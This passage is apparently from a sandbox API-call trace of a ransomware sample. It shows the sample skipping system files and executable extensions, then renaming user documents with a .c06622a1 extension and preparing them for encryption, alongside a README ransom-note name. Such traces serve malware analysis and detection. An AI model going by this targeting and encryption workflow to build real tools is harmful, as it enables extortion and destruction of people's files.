cFileName="45ouoB8nzuDJ.csv", cAlternateFileName="45OUOB~1.CSV")) returned 1 [0148.820] _wcsicmp (_Str1="45ouoB8nzuDJ.csv", _Str2="README.c06622a1.TXT") returned -62 [0148.820] wcsstr (_Str="45ouoB8nzuDJ.csv", _SubStr="README") returned 0x0 [0148.820] _wcsicmp (_Str1="autorun.inf", _Str2="45ouoB8nzuDJ.csv") returned 45 [0148.821] wcslen (_String="autorun.inf") returned 0xb [0148.821] _wcsicmp (_Str1="boot.ini", _Str2="45ouoB8nzuDJ.csv") returned 46 [0148.821] wcslen (_String="boot.ini") returned 0x8 [0148.821] _wcsicmp (_Str1="bootfont.bin", _Str2="45ouoB8nzuDJ.csv") returned 46 [0148.821] wcslen (_String="bootfont.bin") returned 0xc [0148.821] _wcsicmp (_Str1="bootsect.bak", _Str2="45ouoB8nzuDJ.csv") returned 46 [0148.821] wcslen (_String="bootsect.bak") returned 0xc [0148.821] _wcsicmp (_Str1="desktop.ini", _Str2="45ouoB8nzuDJ.csv") returned 48 [0148.821] wcslen (_String="desktop.ini") returned 0xb [0148.821] _wcsicmp (_Str1="iconcache.db", _Str2="45ouoB8nzuDJ.csv") returned 53 [0148.821] wcslen (_String="iconcache.db") returned 0xc [0148.821] _wcsicmp (_Str1="ntldr", _Str2="45ouoB8nzuDJ.csv") returned 58 [0148.821] wcslen (_String="ntldr") returned 0x5 [0148.821] _wcsicmp (_Str1="ntuser.dat", _Str2="45ouoB8nzuDJ.csv") returned 58 [0148.821] wcslen (_String="ntuser.dat") returned 0xa [0148.821] _wcsicmp (_Str1="ntuser.dat.log", _Str2="45ouoB8nzuDJ.csv") returned 58 [0148.821] wcslen (_String="ntuser.dat.log") returned 0xe [0148.821] _wcsicmp (_Str1="ntuser.ini", _Str2="45ouoB8nzuDJ.csv") returned 58 [0148.821] wcslen (_String="ntuser.ini") returned 0xa [0148.821] _wcsicmp (_Str1="thumbs.db", _Str2="45ouoB8nzuDJ.csv") returned 64 [0148.821] wcslen (_String="thumbs.db") returned 0x9 [0148.821] _wcsicmp (_Str1="386", _Str2="csv") returned -48 [0148.821] wcslen (_String="386") returned 0x3 [0148.821] _wcsicmp (_Str1="adv", _Str2="csv") returned -2 [0148.821] wcslen (_String="adv") returned 0x3 [0148.821] _wcsicmp (_Str1="ani", _Str2="csv") returned -2 [0148.821] wcslen (_String="ani") returned 0x3 [0148.821] _wcsicmp (_Str1="bat", _Str2="csv") returned -1 [0148.821] wcslen (_String="bat") returned 0x3 [0148.821] _wcsicmp (_Str1="bin", _Str2="csv") returned -1 [0148.822] wcslen (_String="bin") returned 0x3 [0148.822] _wcsicmp (_Str1="cab", _Str2="csv") returned -18 [0148.822] wcslen (_String="cab") returned 0x3 [0148.822] _wcsicmp (_Str1="cmd", _Str2="csv") returned -6 [0148.822] wcslen (_String="cmd") returned 0x3 [0148.822] _wcsicmp (_Str1="com", _Str2="csv") returned -4 [0148.822] wcslen (_String="com") returned 0x3 [0148.822] _wcsicmp (_Str1="cpl", _Str2="csv") returned -3 [0148.822] wcslen (_String="cpl") returned 0x3 [0148.822] _wcsicmp (_Str1="cur", _Str2="csv") returned 2 [0148.822] wcslen (_String="cur") returned 0x3 [0148.822] _wcsicmp (_Str1="deskthemepack", _Str2="csv") returned 1 [0148.822] wcslen (_String="deskthemepack") returned 0xd [0148.822] _wcsicmp (_Str1="diagcab", _Str2="csv") returned 1 [0148.822] wcslen (_String="diagcab") returned 0x7 [0148.822] _wcsicmp (_Str1="diagcfg", _Str2="csv") returned 1 [0148.822] wcslen (_String="diagcfg") returned 0x7 [0148.822] _wcsicmp (_Str1="diagpkg", _Str2="csv") returned 1 [0148.822] wcslen (_String="diagpkg") returned 0x7 [0148.822] _wcsicmp (_Str1="dll", _Str2="csv") returned 1 [0148.822] wcslen (_String="dll") returned 0x3 [0148.822] _wcsicmp (_Str1="drv", _Str2="csv") returned 1 [0148.822] wcslen (_String="drv") returned 0x3 [0148.822] _wcsicmp (_Str1="exe", _Str2="csv") returned 2 [0148.822] wcslen (_String="exe") returned 0x3 [0148.822] _wcsicmp (_Str1="hlp", _Str2="csv") returned 5 [0148.822] wcslen (_String="hlp") returned 0x3 [0148.822] _wcsicmp (_Str1="icl", _Str2="csv") returned 6 [0148.822] wcslen (_String="icl") returned 0x3 [0148.822] _wcsicmp (_Str1="icns", _Str2="csv") returned 6 [0148.822] wcslen (_String="icns") returned 0x4 [0148.822] _wcsicmp (_Str1="ico", _Str2="csv") returned 6 [0148.822] wcslen (_String="ico") returned 0x3 [0148.822] _wcsicmp (_Str1="ics", _Str2="csv") returned 6 [0148.823] wcslen (_String="ics") returned 0x3 [0148.823] _wcsicmp (_Str1="idx", _Str2="csv") returned 6 [0148.823] wcslen (_String="idx") returned 0x3 [0148.823] _wcsicmp (_Str1="ldf", _Str2="csv") returned 9 [0148.823] wcslen (_String="ldf") returned 0x3 [0148.823] _wcsicmp (_Str1="lnk", _Str2="csv") returned 9 [0148.823] wcslen (_String="lnk") returned 0x3 [0148.823] _wcsicmp (_Str1="mod", _Str2="csv") returned 10 [0148.823] wcslen (_String="mod") returned 0x3 [0148.823] _wcsicmp (_Str1="mpa", _Str2="csv") returned 10 [0148.823] wcslen (_String="mpa") returned 0x3 [0148.823] _wcsicmp (_Str1="msc", _Str2="csv") returned 10 [0148.823] wcslen (_String="msc") returned 0x3 [0148.823] _wcsicmp (_Str1="msp", _Str2="csv") returned 10 [0148.823] wcslen (_String="msp") returned 0x3 [0148.823] _wcsicmp (_Str1="msstyles", _Str2="csv") returned 10 [0148.823] wcslen (_String="msstyles") returned 0x8 [0148.823] _wcsicmp (_Str1="msu", _Str2="csv") returned 10 [0148.823] wcslen (_String="msu") returned 0x3 [0148.823] _wcsicmp (_Str1="nls", _Str2="csv") returned 11 [0148.823] wcslen (_String="nls") returned 0x3 [0148.823] _wcsicmp (_Str1="nomedia", _Str2="csv") returned 11 [0148.823] wcslen (_String="nomedia") returned 0x7 [0148.823] _wcsicmp (_Str1="ocx", _Str2="csv") returned 12 [0148.823] wcslen (_String="ocx") returned 0x3 [0148.823] _wcsicmp (_Str1="prf", _Str2="csv") returned 13 [0148.823] wcslen (_String="prf") returned 0x3 [0148.823] _wcsicmp (_Str1="ps1", _Str2="csv") returned 13 [0148.823] wcslen (_String="ps1") returned 0x3 [0148.823] _wcsicmp (_Str1="rom", _Str2="csv") returned 15 [0148.823] wcslen (_String="rom") returned 0x3 [0148.823] _wcsicmp (_Str1="rtp", _Str2="csv") returned 15 [0148.823] wcslen (_String="rtp") returned 0x3 [0148.823] _wcsicmp (_Str1="scr", _Str2="csv") returned 16 [0148.823] wcslen (_String="scr") returned 0x3 [0148.823] _wcsicmp (_Str1="shs", _Str2="csv") returned 16 [0148.823] wcslen (_String="shs") returned 0x3 [0148.823] _wcsicmp (_Str1="spl", _Str2="csv") returned 16 [0148.824] wcslen (_String="spl") returned 0x3 [0148.824] _wcsicmp (_Str1="sys", _Str2="csv") returned 16 [0148.824] wcslen (_String="sys") returned 0x3 [0148.824] _wcsicmp (_Str1="theme", _Str2="csv") returned 17 [0148.824] wcslen (_String="theme") returned 0x5 [0148.824] _wcsicmp (_Str1="themepack", _Str2="csv") returned 17 [0148.824] wcslen (_String="themepack") returned 0x9 [0148.824] _wcsicmp (_Str1="wpx", _Str2="csv") returned 20 [0148.824] wcslen (_String="wpx") returned 0x3 [0148.824] _wcsicmp (_Str1="lock", _Str2="csv") returned 9 [0148.824] wcslen (_String="lock") returned 0x4 [0148.824] _wcsicmp (_Str1="key", _Str2="csv") returned 8 [0148.824] wcslen (_String="key") returned 0x3 [0148.824] _wcsicmp (_Str1="hta", _Str2="csv") returned 5 [0148.824] wcslen (_String="hta") returned 0x3 [0148.824] _wcsicmp (_Str1="msi", _Str2="csv") returned 10 [0148.824] wcslen (_String="msi") returned 0x3 [0148.824] _wcsicmp (_Str1="pdb", _Str2="csv") returned 13 [0148.824] wcslen (_String="pdb") returned 0x3 [0148.824] _wcsicmp (_Str1="sql", _Str2="csv") returned 16 [0148.824] wcslen (_String="sql") returned 0x3 [0148.824] _wcsicmp (_Str1="sqlite", _Str2="csv") returned 16 [0148.824] wcslen (_String="sqlite") returned 0x6 [0148.824] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0148.824] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.824] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0148.824] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0148.824] wcscpy (in: _Dest=0x44d00d0, _Source="45ouoB8nzuDJ.csv" | out: _Dest="45ouoB8nzuDJ.csv") returned="45ouoB8nzuDJ.csv" [0148.824] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\45ouoB8nzuDJ.csv", dwFileAttributes=0x80) returned 1 [0148.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\45ouoB8nzuDJ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\45ouob8nzudj.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x13c [0148.825] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.825] ReadFile (in: hFile=0x13c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.826] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x4f49e958 [0148.826] RtlComputeCrc32 (PartialCrc=0xe958, Buffer=0x3feb74, Length=0x80) returned 0xa8eed55e [0148.826] RtlComputeCrc32 (PartialCrc=0xd55e, Buffer=0x3feb74, Length=0x80) returned 0xff53fc22 [0148.826] RtlComputeCrc32 (PartialCrc=0xfc22, Buffer=0x3feb74, Length=0x80) returned 0xc65dcbe8 [0148.826] RtlComputeCrc32 (PartialCrc=0xcbe8, Buffer=0x3feb74, Length=0x80) returned 0x19f51438 [0148.826] CloseHandle (hObject=0x13c) returned 1 [0148.826] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.826] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\45ouoB8nzuDJ.csv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\45ouoB8nzuDJ.csv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\45ouoB8nzuDJ.csv" [0148.826] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\45ouoB8nzuDJ.csv") returned 0x3c [0148.826] wcscpy (in: _Dest=0x44e00f8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.826] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\45ouoB8nzuDJ.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\45ouob8nzudj.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\45ouoB8nzuDJ.csv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\45ouob8nzudj.csv.c06622a1"), dwFlags=0x8) returned 1 [0148.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\45ouoB8nzuDJ.csv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\45ouob8nzudj.csv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x13c [0148.828] CreateIoCompletionPort (FileHandle=0x13c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0148.828] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4700020 [0148.833] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x213c86a6 [0148.833] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xc00737a [0148.833] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3bd3db0b [0148.833] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x62c4c0ea [0148.833] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x429fa0f7 [0148.833] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x248536bc [0148.833] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3b74b138 [0148.833] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x14b782f8 [0148.836] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4700094, Length=0x80) returned 0x244ca472 [0148.836] RtlComputeCrc32 (PartialCrc=0xa472, Buffer=0x4700094, Length=0x80) returned 0x69fa63da [0148.836] RtlComputeCrc32 (PartialCrc=0x63da, Buffer=0x4700094, Length=0x80) returned 0x54b62d2c [0148.836] RtlComputeCrc32 (PartialCrc=0x2d2c, Buffer=0x4700094, Length=0x80) returned 0xa93f111e [0148.836] RtlComputeCrc32 (PartialCrc=0x111e, Buffer=0x4700094, Length=0x80) returned 0xed440127 [0148.836] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0148.836] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0148.837] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0148.837] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7068ca10, ftCreationTime.dwHighDateTime=0x1d5e27e, ftLastAccessTime.dwLowDateTime=0x3d25e810, ftLastAccessTime.dwHighDateTime=0x1d5debc, ftLastWriteTime.dwLowDateTime=0x3d25e810, ftLastWriteTime.dwHighDateTime=0x1d5debc, nFileSizeHigh=0x0, nFileSizeLow=0xe8cf, dwReserved0=0x0, dwReserved1=0x0, cFileName="4Vq5hkld9O1EV.xlsx", cAlternateFileName="4VQ5HK~1.XLS")) returned 1 [0148.837] _wcsicmp (_Str1="4Vq5hkld9O1EV.xlsx", _Str2="README.c06622a1.TXT") returned -62 [0148.837] wcsstr (_Str="4Vq5hkld9O1EV.xlsx", _SubStr="README") returned 0x0 [0148.837] _wcsicmp (_Str1="autorun.inf", _Str2="4Vq5hkld9O1EV.xlsx") returned 45 [0148.837] wcslen (_String="autorun.inf") returned 0xb [0148.837] _wcsicmp (_Str1="boot.ini", _Str2="4Vq5hkld9O1EV.xlsx") returned 46 [0148.837] wcslen (_String="boot.ini") returned 0x8 [0148.837] _wcsicmp (_Str1="bootfont.bin", _Str2="4Vq5hkld9O1EV.xlsx") returned 46 [0148.837] wcslen (_String="bootfont.bin") returned 0xc [0148.837] _wcsicmp (_Str1="bootsect.bak", _Str2="4Vq5hkld9O1EV.xlsx") returned 46 [0148.837] wcslen (_String="bootsect.bak") returned 0xc [0148.837] _wcsicmp (_Str1="desktop.ini", _Str2="4Vq5hkld9O1EV.xlsx") returned 48 [0148.837] wcslen (_String="desktop.ini") returned 0xb [0148.837] _wcsicmp (_Str1="iconcache.db", _Str2="4Vq5hkld9O1EV.xlsx") returned 53 [0148.837] wcslen (_String="iconcache.db") returned 0xc [0148.837] _wcsicmp (_Str1="ntldr", _Str2="4Vq5hkld9O1EV.xlsx") returned 58 [0148.837] wcslen (_String="ntldr") returned 0x5 [0148.837] _wcsicmp (_Str1="ntuser.dat", _Str2="4Vq5hkld9O1EV.xlsx") returned 58 [0148.837] wcslen (_String="ntuser.dat") returned 0xa [0148.837] _wcsicmp (_Str1="ntuser.dat.log", _Str2="4Vq5hkld9O1EV.xlsx") returned 58 [0148.837] wcslen (_String="ntuser.dat.log") returned 0xe [0148.837] _wcsicmp (_Str1="ntuser.ini", _Str2="4Vq5hkld9O1EV.xlsx") returned 58 [0148.837] wcslen (_String="ntuser.ini") returned 0xa [0148.837] _wcsicmp (_Str1="thumbs.db", _Str2="4Vq5hkld9O1EV.xlsx") returned 64 [0148.837] wcslen (_String="thumbs.db") returned 0x9 [0148.837] _wcsicmp (_Str1="386", _Str2="xlsx") returned -69 [0148.837] wcslen (_String="386") returned 0x3 [0148.837] _wcsicmp (_Str1="adv", _Str2="xlsx") returned -23 [0148.837] wcslen (_String="adv") returned 0x3 [0148.837] _wcsicmp (_Str1="ani", _Str2="xlsx") returned -23 [0148.837] wcslen (_String="ani") returned 0x3 [0148.837] _wcsicmp (_Str1="bat", _Str2="xlsx") returned -22 [0148.837] wcslen (_String="bat") returned 0x3 [0148.837] _wcsicmp (_Str1="bin", _Str2="xlsx") returned -22 [0148.837] wcslen (_String="bin") returned 0x3 [0148.838] _wcsicmp (_Str1="cab", _Str2="xlsx") returned -21 [0148.838] wcslen (_String="cab") returned 0x3 [0148.838] _wcsicmp (_Str1="cmd", _Str2="xlsx") returned -21 [0148.838] wcslen (_String="cmd") returned 0x3 [0148.838] _wcsicmp (_Str1="com", _Str2="xlsx") returned -21 [0148.838] wcslen (_String="com") returned 0x3 [0148.838] _wcsicmp (_Str1="cpl", _Str2="xlsx") returned -21 [0148.838] wcslen (_String="cpl") returned 0x3 [0148.838] _wcsicmp (_Str1="cur", _Str2="xlsx") returned -21 [0148.838] wcslen (_String="cur") returned 0x3 [0148.838] _wcsicmp (_Str1="deskthemepack", _Str2="xlsx") returned -20 [0148.838] wcslen (_String="deskthemepack") returned 0xd [0148.838] _wcsicmp (_Str1="diagcab", _Str2="xlsx") returned -20 [0148.838] wcslen (_String="diagcab") returned 0x7 [0148.838] _wcsicmp (_Str1="diagcfg", _Str2="xlsx") returned -20 [0148.838] wcslen (_String="diagcfg") returned 0x7 [0148.838] _wcsicmp (_Str1="diagpkg", _Str2="xlsx") returned -20 [0148.838] wcslen (_String="diagpkg") returned 0x7 [0148.838] _wcsicmp (_Str1="dll", _Str2="xlsx") returned -20 [0148.838] wcslen (_String="dll") returned 0x3 [0148.838] _wcsicmp (_Str1="drv", _Str2="xlsx") returned -20 [0148.838] wcslen (_String="drv") returned 0x3 [0148.838] _wcsicmp (_Str1="exe", _Str2="xlsx") returned -19 [0148.838] wcslen (_String="exe") returned 0x3 [0148.839] _wcsicmp (_Str1="hlp", _Str2="xlsx") returned -16 [0148.839] wcslen (_String="hlp") returned 0x3 [0148.839] _wcsicmp (_Str1="icl", _Str2="xlsx") returned -15 [0148.839] wcslen (_String="icl") returned 0x3 [0148.839] _wcsicmp (_Str1="icns", _Str2="xlsx") returned -15 [0148.839] wcslen (_String="icns") returned 0x4 [0148.839] _wcsicmp (_Str1="ico", _Str2="xlsx") returned -15 [0148.839] wcslen (_String="ico") returned 0x3 [0148.839] _wcsicmp (_Str1="ics", _Str2="xlsx") returned -15 [0148.839] wcslen (_String="ics") returned 0x3 [0148.839] _wcsicmp (_Str1="idx", _Str2="xlsx") returned -15 [0148.839] wcslen (_String="idx") returned 0x3 [0148.839] _wcsicmp (_Str1="ldf", _Str2="xlsx") returned -12 [0148.839] wcslen (_String="ldf") returned 0x3 [0148.839] _wcsicmp (_Str1="lnk", _Str2="xlsx") returned -12 [0148.839] wcslen (_String="lnk") returned 0x3 [0148.839] _wcsicmp (_Str1="mod", _Str2="xlsx") returned -11 [0148.839] wcslen (_String="mod") returned 0x3 [0148.839] _wcsicmp (_Str1="mpa", _Str2="xlsx") returned -11 [0148.839] wcslen (_String="mpa") returned 0x3 [0148.839] _wcsicmp (_Str1="msc", _Str2="xlsx") returned -11 [0148.839] wcslen (_String="msc") returned 0x3 [0148.839] _wcsicmp (_Str1="msp", _Str2="xlsx") returned -11 [0148.839] wcslen (_String="msp") returned 0x3 [0148.839] _wcsicmp (_Str1="msstyles", _Str2="xlsx") returned -11 [0148.839] wcslen (_String="msstyles") returned 0x8 [0148.839] _wcsicmp (_Str1="msu", _Str2="xlsx") returned -11 [0148.839] wcslen (_String="msu") returned 0x3 [0148.839] _wcsicmp (_Str1="nls", _Str2="xlsx") returned -10 [0148.839] wcslen (_String="nls") returned 0x3 [0148.839] _wcsicmp (_Str1="nomedia", _Str2="xlsx") returned -10 [0148.839] wcslen (_String="nomedia") returned 0x7 [0148.839] _wcsicmp (_Str1="ocx", _Str2="xlsx") returned -9 [0148.839] wcslen (_String="ocx") returned 0x3 [0148.839] _wcsicmp (_Str1="prf", _Str2="xlsx") returned -8 [0148.839] wcslen (_String="prf") returned 0x3 [0148.839] _wcsicmp (_Str1="ps1", _Str2="xlsx") returned -8 [0148.839] wcslen (_String="ps1") returned 0x3 [0148.839] _wcsicmp (_Str1="rom", _Str2="xlsx") returned -6 [0148.840] wcslen (_String="rom") returned 0x3 [0148.840] _wcsicmp (_Str1="rtp", _Str2="xlsx") returned -6 [0148.840] wcslen (_String="rtp") returned 0x3 [0148.840] _wcsicmp (_Str1="scr", _Str2="xlsx") returned -5 [0148.840] wcslen (_String="scr") returned 0x3 [0148.840] _wcsicmp (_Str1="shs", _Str2="xlsx") returned -5 [0148.840] wcslen (_String="shs") returned 0x3 [0148.840] _wcsicmp (_Str1="spl", _Str2="xlsx") returned -5 [0148.840] wcslen (_String="spl") returned 0x3 [0148.840] _wcsicmp (_Str1="sys", _Str2="xlsx") returned -5 [0148.840] wcslen (_String="sys") returned 0x3 [0148.840] _wcsicmp (_Str1="theme", _Str2="xlsx") returned -4 [0148.840] wcslen (_String="theme") returned 0x5 [0148.840] _wcsicmp (_Str1="themepack", _Str2="xlsx") returned -4 [0148.840] wcslen (_String="themepack") returned 0x9 [0148.840] _wcsicmp (_Str1="wpx", _Str2="xlsx") returned -1 [0148.840] wcslen (_String="wpx") returned 0x3 [0148.840] _wcsicmp (_Str1="lock", _Str2="xlsx") returned -12 [0148.840] wcslen (_String="lock") returned 0x4 [0148.840] _wcsicmp (_Str1="key", _Str2="xlsx") returned -13 [0148.840] wcslen (_String="key") returned 0x3 [0148.840] _wcsicmp (_Str1="hta", _Str2="xlsx") returned -16 [0148.840] wcslen (_String="hta") returned 0x3 [0148.840] _wcsicmp (_Str1="msi", _Str2="xlsx") returned -11 [0148.840] wcslen (_String="msi") returned 0x3 [0148.840] _wcsicmp (_Str1="pdb", _Str2="xlsx") returned -8 [0148.840] wcslen (_String="pdb") returned 0x3 [0148.840] _wcsicmp (_Str1="sql", _Str2="xlsx") returned -5 [0148.840] wcslen (_String="sql") returned 0x3 [0148.840] _wcsicmp (_Str1="sqlite", _Str2="xlsx") returned -5 [0148.840] wcslen (_String="sqlite") returned 0x6 [0148.840] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0148.840] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0148.840] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0148.841] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0148.841] wcscpy (in: _Dest=0x44d00d0, _Source="4Vq5hkld9O1EV.xlsx" | out: _Dest="4Vq5hkld9O1EV.xlsx") returned="4Vq5hkld9O1EV.xlsx" [0148.841] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4Vq5hkld9O1EV.xlsx", dwFileAttributes=0x80) returned 1 [0148.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4Vq5hkld9O1EV.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4vq5hkld9o1ev.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x630 [0148.841] SetFilePointerEx (in: hFile=0x630, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.841] ReadFile (in: hFile=0x630, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0148.842] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x25f29e89 [0148.842] RtlComputeCrc32 (PartialCrc=0x9e89, Buffer=0x3feb74, Length=0x80) returned 0xbd4dbaa [0148.842] RtlComputeCrc32 (PartialCrc=0xdbaa, Buffer=0x3feb74, Length=0x80) returned 0x2a2ff82 [0148.842] RtlComputeCrc32 (PartialCrc=0xff82, Buffer=0x3feb74, Length=0x80) returned 0x82b410da [0148.842] RtlComputeCrc32 (PartialCrc=0x10da, Buffer=0x3feb74, Length=0x80) returned 0xe44fe088 [0148.842] CloseHandle (hObject=0x630) returned 1 [0148.842] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0148.842] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4Vq5hkld9O1EV.xlsx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4Vq5hkld9O1EV.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4Vq5hkld9O1EV.xlsx" [0148.842] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4Vq5hkld9O1EV.xlsx") returned 0x3e [0148.842] wcscpy (in: _Dest=0x44e00fc, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0148.842] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4Vq5hkld9O1EV.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4vq5hkld9o1ev.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4Vq5hkld9O1EV.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4vq5hkld9o1ev.xlsx.c06622a1"), dwFlags=0x8) returned 1 [0148.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4Vq5hkld9O1EV.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4vq5hkld9o1ev.xlsx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x630 [0148.844] CreateIoCompletionPort (FileHandle=0x630, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0148.844] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4790020 [0148.849] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7b851994 [0148.849] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x65979188 [0148.849] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x48c15b41 [0148.849] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xc791b8d [0148.849] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x220207ab [0148.849] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x58506874 [0148.850] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x199cc71a [0148.850] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6db4d3a7 [0148.853] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4790094, Length=0x80) returned 0x1b3021be [0148.853] RtlComputeCrc32 (PartialCrc=0x21be, Buffer=0x4790094, 